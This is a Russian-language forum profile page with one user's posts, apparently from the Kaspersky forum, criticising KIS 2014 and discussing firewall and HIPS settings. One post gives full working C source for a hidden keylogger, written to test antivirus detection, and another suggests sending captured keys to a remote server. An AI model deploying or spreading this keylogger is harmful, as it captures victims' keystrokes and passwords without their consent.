Jump to content

WhKitten

Members
  • Content Count

    172
  • Joined

  • Last visited

Everything posted by WhKitten

  1. Как вариант: миранда запускается другим приложением, которому запрещён доступ в Интернет. Как вариант: сетевая активность разрешена пакетными правилами файрволла, а они имеют приоритет над правилами программы.
  2. Qt, как раз была в 2013 версии и выпиливание его из 2014 одно из главных нововведений. Qt используется большим количеством софта (можно определить по наличию файлов qt*.dll в папке с программой) - как правило GUI в этих программах работает на отлично. Что используется в 2014 версии я не знаю, Windows Forms??? Более поздние версии отличаются упрощением интерфейса. Тут была тема: http://forum.kaspersky.com/index.php?showtopic=281802
  3. Есть функция F, которая для аргумента x, возвращает A. В неё добавили плюшки, чтобы она для аргумента y, возвращала B. После добавления плюшки, F(x) вдруг стало возвращать C, но фичу, которая вызывала F(x) мы удалил, так что всё ОК. Где гарантии, что какая-нибудь ещё фича не вызовет F(x)? Где гарантии, что в каком-нибудь ещё коде не понадобится вызывать F(x)? Так, что это баг.
  4. Мне, я подозреваю, что многие не считают 2014 версию лучше 2012. Или новая версия продукта не должна быть лучше предыдущей? Или мнение пользователей форума не имеет никакого значения?
  5. Ну это в любом случае баг и его в любом случае надо будет исправлять. Тесты старого функционала можно автоматизировать, он же не меняется, а тестировать только новый. На это уйдут ресурсы, зато ни у кого не будет сомнений, что версия 2015, тогда будет лучше чем 2014. К счастью многие производители антивирусов придерживаются иного мнения. У многих версию 2013 года имеет польный функционал всех предыдущих версий. А так интересно было бы составить на этом форуме опрос, сколько процентов считает версию 2014 лучше, чем 2012 и 2013.
  6. KIS6 уже устарел. Где я говорю про "взял и добавил (или убрал)". Я про обратное пишу, зачем убирать?
  7. Если они предложат пользователю безопасные настройки, то пользователь будет недоволен. Безопасность подразумевает ограничения, а пользователи хотят, чтобы после установки антивируса всё работало также, как и до его установки, что невозможно. К тому же ничего о компьютере пользователя они не знают, как можно защитить не зная, что защищать и от чего защищать. Ну например: шифровать документы может как легальный софт, для защиты ит от посторонних глаз, так и вирус, а может проводится и легальным софтом неявно запущенным вирусом (ну например добавил вирус назначенное задание по шифрованию документов). Приходится выставлять настройки, которые обеспечат некоторый компромиссный вариант: "образно говоря" антивирус убивает только, то что на 90% опасно, а остальные 10% пропускает.
  8. Так код для этой каждой галочки, точечки и фичечки был уже написан и протестирован. Делать новый продукт не хуже предыдущего это лозунги? Я и пишу лучше бы развивали одну версию, хоть 2012, хоть 2013, хоть 2014 постепенно добавляя в неё фичи. Помомему трудозатраты при грамотном проектировании получатся меньше, чем каждый год выпускать новую версию в которой из изменений урезанный функционал, увеличенное время запуска и переписанный с нуля GUI?
  9. Я тоже так думал, пока лог антивируса не посмотрел. Никакого Flash приложения и GUP я не ставил, а оно в инет ломится. Где-то в Trusted группе, в логе ЛК не додумалась указать полный путь к приложению... Везде, где есть ключевое слово командная строка требуется писать батники, а то придётся писать эти батники вместо блокнота в окне командной строки и не один раз. Можно было просто переместить все настройки ненужные косоруким пользователям на вкладку Advanced или ещё куда-нибудь. Естественно. Большинство специалистов считают настройки KIS по умолчание небезопасными, я уверен в самой ЛК так считают. Авторежим это хорошо, не люблю отвечать на всплывающие окна ни о чём... Чем авторежим в 2014 лучше, чем в 2013? Я же не против развития продукта. Я против выкидывания фич и выпуска этого, как новой версии. Согласитесь, что иконки в GUI это последние, что рассматривает пользователь, при выборе антивируса. KIS 2013 патч I. Импорт настроек через GUI работает без пароля.
  10. Если кто-то блокировал, значит ему это надо. Тут не только браузер ставится. Зачем доступ в Интернет видеоплееру, а программе просмотра картинок, а менеджеру паролей, криптографическому ПО и ещё много каким программам он не нужен. А блокировать доступ в инет браузеру очень удобно для проверки файрволла. У меня KIS 2013 блокирует доступ в Интернет для: Greenshot, GUP, XnView, Daemon Tools, Notepad++, непонятному флеш приложению. Вот зачем этому всему Интернет? Не видя этого лога бы я бы даже не знал о существовании на моём компьютере какого-то GUP и непонятного флеш приложения, которое так и не получило доступ в Интернет... Т.е. мне надо самому для этих целей батник и писать и пароль на настройки задавать. А пароль надо где-то хранить в безопасном месте, а его оттуда батником извлекать и.т.д, да ещё и постоянно пароль вводить, чтобы поменять настройки антивируса. А иногда бывает нужно, когда какая-нибудь недовернная программа (оказавшись в этой группе по ошибке) запускает доверенную.
  11. А чем KIS2014 лучше KIS2013? Мне лично ситуация видется так: Был KIS2012 (который я не видел), из него удалили Sandbox, получился KIS2013, из которого удалили вменяемый GUI на Qt, добавили тормозное поделие непонятно на чём, сделали сообщения в интерактивном режиме ещё менее информативными (чтобы вообще ничего непонятно было), удали возможность просмотра и редактирования настроек доступа к Интернету в окне файрволла, удалили импорт/экспорт настроек, поддержку нескольких почтовых клиентов, вырезали гео-фильты и скорей всего что-то ещё и получили версию 2014. А зачем было вообще 2014 версию выпускать? Почему нельзя было взять и развивать одну/единственную версию, постепенно добавляя в неё фичи и ничего не удаляя, как делают все нормальные производители софта? Решили, что развивать какую-то фичу нецелесообразно? Ну так оставили её и просто прекратили обновлять и оказывать по ней поддержку. Зачем удалять? Это больше на саботаж похоже, чем на развитие продукта...
  12. Ну этоже элементарно решается своими силами, под админом в командной строке netsh advfirewall set allprofiles firewallpolicy blockinboundalways,blockoutbound и у вас вообще сеть без KIS работать не будет. Кстати, в Windows программы запускаются не абы как, а имеют определённые зависимости и последовательность запуска, поэтому ситуация когда запуск браузера до антивируса невозможен легко достижима. Например, брандмауэр Windows запускается до инициализации самой сети и когда поднимается сеть, он уже её блокирует.
  13. Сейчас заметил, что в настройках HIPS ничего про снятия клавиш нет... Мониторинг активности тоже ничего не находит. Добавить программе поддержку сети и можно пересылать все нажатые клавиши на удалённый сервер и KIS ничего кроме доступа к сети не заметит...
  14. Во первых: https://www.virustotal.com/ru/file/d015d568...3f093/analysis/ Во вторых: GetAsyncKeyState вызывается 36 раз, каждые 10-20 мс, т.е. 1800-3600 раз в секунду, а антивирус с включённым HIPS не выдал даже одно предупреждение, что программа может быть опасна. В третьих: кейлогеру для работы нужны только права на запуск в KIS, всё остальное можно ставить в Block. Я ожидал, что хотя бы одно предупреждение появится от HIPS.
  15. Я точно не знаю, но полагаю, что не проверяются архивы и неиспольняемые файлы (видео, картинки, музыка, тексты и прочее).
  16. KIS2014 HIPS не реагирует вообще. Даже если поместить в сильные ограничения. Но Safe Money работает! Это радует.
  17. Решил протестить KIS, написав дилетанский KeyLog'ер на C. KIS вообще на него не реагирует, а кейлогер работает! У кейлогера отсутствует интерфейс. После запуска, кейлогера создаёт в папке с собой файл keylog.exe.log, в который пишет все нажатые клавиши. Работает под пользователем, права никакие не нужны. Завершать кейлогер надо через диспетчер задач. Поскольку кейлогер дилетанский, он обращает внимания только на английские буквы и цифры. Код кейлогера: #pragma comment (linker, "/ENTRY:mainCRTStartup") #pragma comment (linker, "/SUBSYSTEM:WINDOWS") #define _WIN32_LEAN_AND_MEAN #include <windows.h> HANDLE hFile; void write_char(char c) { char v[2]; v[0] = c; v[1] = 0; DWORD n; WriteFile(hFile, v, 1, &n, 0); FlushFileBuffers(hFile); } int main() { char logfile[MAX_PATH]; GetModuleFileName(0, logfile, MAX_PATH); lstrcat(logfile, ".log"); hFile = CreateFile(logfile, GENERIC_WRITE, FILE_SHARE_READ, 0, CREATE_ALWAYS, 0, 0); char num_table_us[255]; num_table_us[unsigned('1')] = '!'; num_table_us[unsigned('2')] = '@'; num_table_us[unsigned('3')] = '#'; num_table_us[unsigned('4')] = '$'; num_table_us[unsigned('5')] = '%'; num_table_us[unsigned('6')] = '^'; num_table_us[unsigned('7')] = '&'; num_table_us[unsigned('8')] = '*'; num_table_us[unsigned('9')] = '('; num_table_us[unsigned('0')] = ')'; while (true) { Sleep(1); bool shift = (GetKeyState(VK_SHIFT) < 0); for (int i='0'; i<='9'; ++i) { if (GetAsyncKeyState(i) & 1) { if (shift) write_char(num_table_us[unsigned(i)]); else write_char(i); } } for (int i='A'; i<='Z'; ++i) { if (GetAsyncKeyState(i) & 1) { if (shift) write_char(i); else write_char(i+32); } } } } KeyLog.zip
  18. Всё это итак запрещено Windows при влючённом UAC. Даже ещё виртуализация реестра применяется. Вредоносному ПО, если оно не собирается конкретно сносить Windows с антивирусом не нужно таких прав. Ему вполне достаточно прав на чтение/запись Ваших файлов и доступ в Интернет. Так и зашифровать Ваши документы можно и данные владельцу отослать, себя обновить и другое вредоносное ПО скачать.
  19. Тут я создал похожую тему: http://forum.kaspersky.com/index.php?showtopic=281336 Не бойтесь по поводу "лишних" ограничений. Если включён автоматический режим, то Low-Restricted и Trusted это одно и тоже, т.е. никаких ограничений там нет. Поэтому, как я понимаю, под правильной настройкой Maratka имеет ввиду выставить там везде BLOCK или отключить эвристику и перемещать эти приложения в High-Restricted. Ну да, программа, которой нет в KSN работать не будет...
  20. Не обращал на это внимание. Сейчас заметил. ЛК решила выпилить из продукта Qt и написать GUI самостоятельно? Тогда понятно, почему пришлось выкинуть столько фич. А чем Qt мешал, некрасиво? Так 2014 версия в этом плане хуже.
  21. И есть даже такие, которые позволяли заразить хост, даже если на нём стоял файрволл, которые блокирует TCP SYN (т.е. всех входящие подключения)? Просто переполнение там различных таблиц, согласование размеров окна вообще не происходит, если файрволл блокирует все входящие. И как раз такие настройки все эти проблемы решают. Но вернёмся к теме. Выполнил тот же Test Case на 2013 версии. Усложнил, дождался добавляения 10000 приложений в БД антивируса. И это вообще не повлияло на скорость открытия списка приложения. Т.е. 2013 версия, патч I, в той же Windows 8.1 64-бит, справилась на отлично. И более того, после импорта/экспорта настроек 2013 версия вообще удалила все несуществующие приложения из списка - проявив невиданный интелект. Я даже удалил часть приложений после первого импорта и импортировал теже настройки ещё раз - удалённые приложения были удалены! Это шесть баллов.
  22. Ну учитывая, что с 74 года такой ни одной такой дырки не нашли и ней будут подвержены без исключения все устройства подключённые к сети, то я думаю это достаточно безопасно. В отличие от бесконечного количества уязвимостей, которые находят в запущенных на компьютерах службах. Антивирус может не то что уязвимость не знать, а вообще понятие не иметь о существовании самой службы в которой есть уязвимость.
  23. Элементарно. Блокировать все входящие соединения. Или технически, блокировать входящие TCP SYN, и TCP SYN,ACK с неверным Acknowledgment number. Если файрволл достаточно умный, то можно и блокировать TCP и UDP с сокетов, на которые не отсылались запросы. Это фактически настройки файрволла Windows по-умолчанию, с некоторыми исключениями.
  24. IPS нужны сигнатуры, чтобы блокировать атаку. Если сигнатур нет, она не будет заблокирована.
  25. 1. Друг к Вам придёт с заражённым компьютером, подключится к Вашей сети и заразит Ваш компьютер, посредством уязвимости в одной из служб. 2. Вирус воспользуется какой-нибудь уязвимостью в вашем роутере, получит над ним контроль и заразит Ваш компьютер посредством уязвимости в одной из служб. 3. Вирус заразит один из компьютеров доверенной сети, посредством уязвимости (к примеру в браузере) и заразит Ваш компьютер посредством уязвимости в одной из служб. Во всех случаях, если эта уязвимая служба Вами не использовалась, файрволл мог бы это предотвратить.
×
×
  • Create New...

Important Information

We use cookies to make your experience of our websites better. By using and further navigating this website you accept this. Detailed information about the use of cookies on this website is available by clicking on more information.